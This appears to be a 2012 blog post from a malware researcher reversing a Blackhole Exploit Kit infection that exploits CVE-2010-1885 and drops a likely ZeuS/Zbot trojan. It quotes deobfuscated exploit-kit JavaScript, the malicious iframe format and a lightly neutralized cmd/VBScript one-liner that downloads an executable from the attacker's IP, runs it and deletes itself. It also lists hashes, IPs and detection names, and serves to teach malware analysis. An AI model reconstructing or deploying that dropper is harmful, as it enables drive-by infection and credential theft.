That was just happened today and was really made my day. Since the flaw was fixed by microsoft in about 2years ago I never expect to see un-patched systems which still having this flaw, yet it does exist, bunch of it. Surprisingly, since there are some possibility of XP users are also having similar risk so I dare myself to write the reversing of this infection for your information on handling similar case.
The infectors was BHEK of in 85.17.165.22 , looks being up less than 24h with reports below here--->>[URL-QUERY-LINK] The landing page is: h00p://85.17.165.22/main.php?page=9adab93ef87c3421 And it has the below infection components:The moral of the story is, do not under estimate "every" exploit implemented in the exploit kit. Those exploits are picked up well and are meant for a well-planned infection purpose, even the one you think has the smaller chance to infect. when it hits, you may get yourself an epidemic./Gam.jar EXPL: Java/2012-1723 (go to below explanation) /data/field.swf EXPL: SWF/Cve-2011-0611 ---> shellcode --> same payload /data/ap1.php EXPL: JS/PDF.PdfCtrl old ver. SAV: AcroPDF.PDF --> shellcode --> same payload /data/ap2.php EXPL: JS/PDF.PdfCtrl new ver. SAV: AcroPDF.PDF --> shellcode --> same payload /w.php?f=f4dfb&e=1 EXPL: EXPL: Java/2012-1723 SAV: Gam.Jar --> Shellcode --> SAV: same payload /w.php?f=f4dfb&e=2 EXPL: CVE-2010-2561/msxml2.XMLHTTP SAV: .//..//6f9d07d.exe --> same payload /w.php?f=f4dfb&e=5 EXPL: CVE-2010-1885/HRC vulns SAV: %TEMP%\file.exe↑see the last line closely, this is the case that I will describe here. If you deobfs the landing page well, you'll see BHEK plugin detect, just in case, you can see my neutralized deobfs code here: --->>[PASTEBIN] in the line 1790 you will see code like thisFunction spl4(){ try { For (var i = O, m; i < navigator・plugins・length; i ++ ){ var name = navigator・plugins「i」.name; iF (name.indexOF('Media Player') !=- 1){ m = document・createElement('IFRAM3'); m.setAttribute('src', './data/hhcp.php?c=F4dFb'); m.setAttribute('width', O); m.setAttribute('height', O); document・body「'appendChild'」(m) }Which will lead you to the downloaded html file at:h00p://85.17.165.22/data/hhcp.php?c=F4dFbAnd this file will contain the other obfs code like this: eval can be decoded as per below pic, an iframe contains exploit and - also an execution arbitary command: The format of the malicious iframe is as per below:<iframe src="xxxxx=<script defer>Run(yyyyy);</script>"> //legends: xxxxx=CVE-2010-1885 PoC strings yyyyy=executable aribary commandIf you compare "xxxxx" with the PoC of CVE-2010-1885 you'll see similarity: ↑here's the PoC link-->http://seclists.org/fulldisclosure/2010/Jun/205 Following, the "yyyyy" is combination of cmd and Windows (Visual Basic) Script commands:cmd /c echo FileName = "%TEMP%\file・exe">>%TEMP%\ go・vbs&&echo url="http://x・x・x・x/w・php?f=f4dfb&e=5" >>%TEMP%\ go・vbs&&echo Set objHTTP = CreateObject("MSXML2・XMLHTTP")>>%TEMP%\ go・vbs&&echo Call objHTTP・Open("GET", url, False)>>%TEMP%\ go・vbs&&echo objHTTP・Send>>%TEMP%\ go・vbs&&echo set oStream = createobject("Adodb・Stream")>>%TEMP%\ go・vbs&&echo Const adTypeBinary = 1 >>%TEMP%\ go・vbs&&echo Const adSaveCreateOverWrite = 2 >>%TEMP%\ go・vbs&&echo Const adSaveCreateNotExist = 1 >>%TEMP%\ go・vbs&&echo oStream・type = adTypeBinary >>%TEMP%\ go・vbs&&echo oStream・open >>%TEMP%\ go・vbs&&echo oStream・write objHTTP・responseBody>>%TEMP%\ go・vbs&&echo oStream・savetofile FileName, adSaveCreateNotExist >>%TEMP%\ go・vbs&&echo oStream・close>>%TEMP%\ go・vbs&&echo set oStream = nothing >>%TEMP%\ go・vbs&&echo Set xml = Nothing >>%TEMP%\ go・vbs&&echo Set WshShell = CreateObject("WScript・Shell") >>%TEMP%\ go・vbs&&echo WshShell・Run FileName, 0, True >>%TEMP%\ go・vbs&&echo Set FSO = CreateObject("Scripting・FileSystemObject") >>%TEMP%\ go・vbs&&echo FSO・DeleteFile "%TEMP%\go・vbs" >>%TEMP%\ go・vbs|cscript %TEMP%\ go・vbs>nul (PS: the above code was neutralized and NOT malicious!)↑Which means:Download file from 85.17.165.22/w・php?f=f4dfb&e=5 & save it in %TEMP%\file.exe, via MSXML2・XMLHTTP stream, and then runs it via WshShell.Run and DELETE the saved file afterwards. (This was the reason I couldn't get the sample file from infected PC and I had to - extract it out of the memory manually)The worse part is almost everyone miss this tiny obfuscated file- even in the Virus Total ONLY 3(three) products can detect it:MD5: 5629b24e0faae7b42127df9f592fed48 File size: 5.2 KB ( 5326 bytes ) File name: hhcp.php@c=f4dfb File type: HTML Tags: html cve-2010-1885 exploit Detection: 3 / 43 Analysisdate:2012-09-19 19:36:44 UTC ( 1 時間, 7 分 ago ) URL: ------>>[VIRUS-TOTAL]Furthermore the payload looks like this "Fake" Intel Logo: Which runs these both processes:PID MEM PATH Event 216 2007536674 %path%unknown.exe Global\crypt32LogoffEvent //Stays as process 840 2088831062 %System%svchost.exe //Kicking off svchostI don't have enough time to do deep analysis of this binary, so a quicky then.. Binary snapshot:0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ.............. 0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 C8 00 00 00 ................ 0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th 0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno 0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$....... 0080 A9 0B B2 8A ED 6A DC D9 ED 6A DC D9 ED 6A DC D9 .....j...j...j.. 0090 EB 49 D6 D9 E6 6A DC D9 ED 6A DD D9 F3 6A DC D9 .I...j...j...j.. 00A0 73 4A FF D9 EC 6A DC D9 B4 49 CF D9 EC 6A DC D9 sJ...j...I...j.. 00B0 82 75 D8 D9 EC 6A DC D9 52 69 63 68 ED 6A DC D9 .u...j..Rich.j.. 00C0 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 07 00 ........PE..L... 00D0 A8 78 57 50 00 00 00 00 00 00 00 00 E0 00 03 01 .xWP............ Section: .text 0x44000(snipped) .rdata 0x45000 0x2d84 11776 .data 0x48000 0xd38 3584 .adata 0x49000 0x10 512 .CRT 0x4b000 0x10 512 <--- cryptor pack .rsrc 0x4c000 0x1a18 7168 Entry Point: 0x1e490 Compile Time: 0x505778A8 [Mon Sep 17 19:23:20 2012 UTC] Packer: unknownShortly, some suspicious calls detected while it stays in process.. Below is my adventure in reversing graph, the way it steals so many info - I guess is a variant of ZeuS Trojan or ZeuS/Zbot↓ In the mean time Virus Total can detect this as per below:MD5: c559573fc5ab9862607e4fa4b2edfc04 File size: 294.0 KB ( 301056 bytes ) File name: unknown.exe File type: Win32 EXE Detection: 19 / 43 Analysis date: 2012-09-19 17:58:31 UTC ( 1 分 ago ) URL:---->>[VIRUS-TOTAL]The current malware names are:F-Secure : Trojan.Generic.KD.731435 Microsoft : PWS:Win32/Zbot VIPRE : Trojan.Win32.Generic!BT Symantec : Trojan.Gen TrendMicro : TROJ_GEN.R42CDII McAfee-GW-Edition : PWS-Zbot.vo!a Fortinet : W32/Androm.DW!tr TrendMicro-HouseCall : TROJ_GEN.R42CDII Avast : Win32:Trojan-gen Ikarus : Trojan-Spy.Win32.Zbot GData : Trojan.Generic.KD.731435 Kaspersky : HEUR:Trojan.Win32.Generic BitDefender : Trojan.Generic.KD.731435 McAfee : PWS-Zbot.gen.ana Panda : Trj/Genetic.gen AhnLab-V3 : Spyware/Win32.Zbot AntiVir : TR/Injector.air.1 Sophos : Mal/EncPk-AGK Comodo : UnclassifiedMalware
And, to malware analyser/researcher(etc), to understand how infection works by reversing the malicious+exploit code by yourself will change the way you think about handling malware in the future, trust me. You may continue to whatever automation system/tool you use, but at least, for one time, try to figure it out by your ownself! I won't sell you no crap.
#MalwareMustDie!